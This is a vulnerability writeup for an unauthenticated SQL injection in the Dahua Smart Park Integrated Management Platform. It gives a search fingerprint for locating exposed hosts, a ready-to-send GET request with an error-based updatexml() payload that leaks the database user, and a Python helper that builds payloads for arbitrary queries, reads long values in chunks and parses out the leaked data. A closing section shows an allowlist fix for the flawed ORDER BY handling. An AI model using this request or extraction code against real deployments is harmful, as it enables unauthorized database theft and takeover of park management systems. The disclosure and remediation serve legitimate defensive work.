0x01 Product Introduction
"Dahua Smart Park Integrated Management Platform" is a comprehensive management platform covering park operations, resource allocation and intelligent services. It is designed to help optimize the allocation of park resources to meet diverse management needs, while improving the user experience through intelligent services.
0x02 Vulnerability Overview
The Dahua Smart Park Integrated Management Platform does not effectively filter user input but concatenates it directly into SQL statements, leaving the system exposed to SQL injection. An unauthenticated remote attacker can exploit this vulnerability to read sensitive information from the database and, by exploiting it further, gain control of the target system.
0x03 Reproduction environment
Hunter (鹰图) asset-search fingerprint: web.body="/WPMS/asset/lib/gridster/"
0x04 Vulnerability Reproduction
PoC
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
The orderBy value inside pageJson is concatenated into the ORDER BY clause, so the injected updatexml() call is evaluated by the database. updatexml() is handed a string that is not valid XPath, and MySQL echoes that string back in its error message; because select user() is embedded between the 0x7e ('~') markers, the error text in the response discloses the current database user. Two caveats: updatexml() is a MySQL function, so this payload only works against a MySQL/MariaDB back end, and MySQL truncates the echoed string to 32 characters, so longer values have to be read in pieces with substr().
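The following is an added example, not code from the original writeup or from Dahua: it builds the request path from the PoC above for an arbitrary MySQL expression, splits long values into substr() windows that fit the 32-character limit of the updatexml() error text, and parses the disclosed value out of a response body. The endpoint path and payload shape are taken from the PoC; the sample response body is constructed, and the assumption that the target returns the raw MySQL error text to the client is exactly what the PoC relies on.

```python
import json
import re
from urllib.parse import quote

# Endpoint path from the PoC above; searchJson, pageJson and extend are
# URL-encoded JSON objects carried in the path itself.
PATH_TEMPLATE = ("/portal/services/carQuery/getFaceCapture/searchJson/{search}"
                 "/pageJson/{page}/extend/{extend}")

# MySQL reports the invalid XPath string back verbatim in the error text, e.g.
#   XPATH syntax error: '~root@localhost~'
# The trailing '~' is optional in the pattern because the error text is cut
# at 32 characters and a long value swallows the closing marker.
XPATH_ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*?)~?'")

# 32 characters minus the two '~' markers leaves 30 characters of data per request.
CHUNK_LEN = 30


def build_payload(expression: str) -> str:
    """Wrap a MySQL expression in the error-based updatexml() payload from the PoC."""
    return f"1 and 1=updatexml(1,concat(0x7e,({expression}),0x7e),1)--"


def build_path(expression: str) -> str:
    """Return the request path with the payload in the orderBy key of pageJson.

    quote() with safe="" percent-encodes every reserved character, which
    covers the %7B, %7D and %22 seen in the original PoC URL.
    """
    page_json = json.dumps({"orderBy": build_payload(expression)},
                           separators=(",", ":"))
    return PATH_TEMPLATE.format(search=quote("{}", safe=""),
                                page=quote(page_json, safe=""),
                                extend=quote("{}", safe=""))


def chunk_expressions(expression: str, total_len: int):
    """Yield substr() windows so a value longer than CHUNK_LEN characters can be
    read across several requests. Assumption: the caller has already learned
    total_len, for example by extracting length((expression)) first."""
    for start in range(1, total_len + 1, CHUNK_LEN):
        yield f"substr(({expression}),{start},{CHUNK_LEN})"


def extract_value(response_body: str):
    """Pull the leaked value out of a response body, or return None when there
    is no XPath error (patched target, non-MySQL back end, or errors hidden)."""
    match = XPATH_ERROR_RE.search(response_body)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Constructed response body standing in for a real target's error page.
    sample_body = "<html><pre>XPATH syntax error: '~root@localhost~'</pre></html>"
    print(build_path("select user()"))
    print(extract_value(sample_body))
    for expr in chunk_expressions("select version()", 45):
        print(build_payload(expr))
```

extract_value() returning None on a host that matches the fingerprint is the quickest offline check that a patch or an error-suppressing WAF rule is in place; the request must still be sent with the headers shown in the PoC to reproduce the original result.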
0x05 Remediation
Restrict access to the platform by source address, and do not expose it to the Internet unless strictly necessary.
Apply the vendor's patch as soon as it is available. In the code, the orderBy value is a column identifier rather than a data value, so it cannot be passed as a bound parameter; it must be checked against an allowlist of permitted sort columns instead of being concatenated into the statement.
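As an added example (not Dahua's code, and the table and column names are constructed), the vulnerable sort-field concatenation beside an allowlist-based replacement. SQLite stands in for the MySQL back end: it has no updatexml(), so the injected payload fails at parse time instead of leaking data, but the error itself shows that the client-supplied text reached the SQL engine, which is the defect the allowlist removes.

```python
import sqlite3

# Constructed sample schema; the platform's real table and column names are not known.
SCHEMA = """
CREATE TABLE face_capture (id INTEGER PRIMARY KEY, capture_time TEXT, plate TEXT);
INSERT INTO face_capture VALUES (1, '2023-01-02 10:00:00', 'B001'),
                                (2, '2023-01-01 09:00:00', 'A002'),
                                (3, '2023-01-03 08:00:00', 'C003');
"""

# The orderBy value from the PoC above.
PAYLOAD = "1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"


def vulnerable_query(order_by: str) -> str:
    """Mirrors the flaw: the orderBy value from pageJson is concatenated into the SQL."""
    return f"SELECT id FROM face_capture ORDER BY {order_by}"


# Sort fields are identifiers, not values, so they cannot be bound as
# parameters; the fix maps client-side keys to known columns and rejects the rest.
SORT_COLUMNS = {"id": "id", "captureTime": "capture_time", "plate": "plate"}


def safe_query(order_by: str, direction: str = "asc") -> str:
    """Build the same query with the sort column and direction taken from allowlists."""
    column = SORT_COLUMNS.get(order_by)
    if column is None or direction.lower() not in ("asc", "desc"):
        raise ValueError(f"rejected sort parameter: {order_by!r} {direction!r}")
    return f"SELECT id FROM face_capture ORDER BY {column} {direction.upper()}"


def run(sql: str) -> list:
    """Execute a query against a fresh in-memory copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return [row[0] for row in conn.execute(sql)]


def demonstrate() -> dict:
    """Compare both builders on a legitimate sort key and on the PoC payload."""
    results = {
        "benign_vulnerable": run(vulnerable_query("plate")),
        "benign_safe": run(safe_query("captureTime")),
    }
    try:
        run(vulnerable_query(PAYLOAD))
        results["payload_vulnerable"] = "executed"
    except sqlite3.OperationalError as exc:
        # The payload was parsed as SQL; on MySQL updatexml() would run here.
        results["payload_vulnerable"] = f"parsed as SQL: {exc}"
    try:
        safe_query(PAYLOAD)
        results["payload_safe"] = "accepted"
    except ValueError:
        results["payload_safe"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

Rejecting unknown keys outright, rather than trying to strip quotes or keywords from them, is what makes the allowlist hold up: the payload never needs a quote character to reach the ORDER BY clause, so quote-escaping alone would not have stopped it.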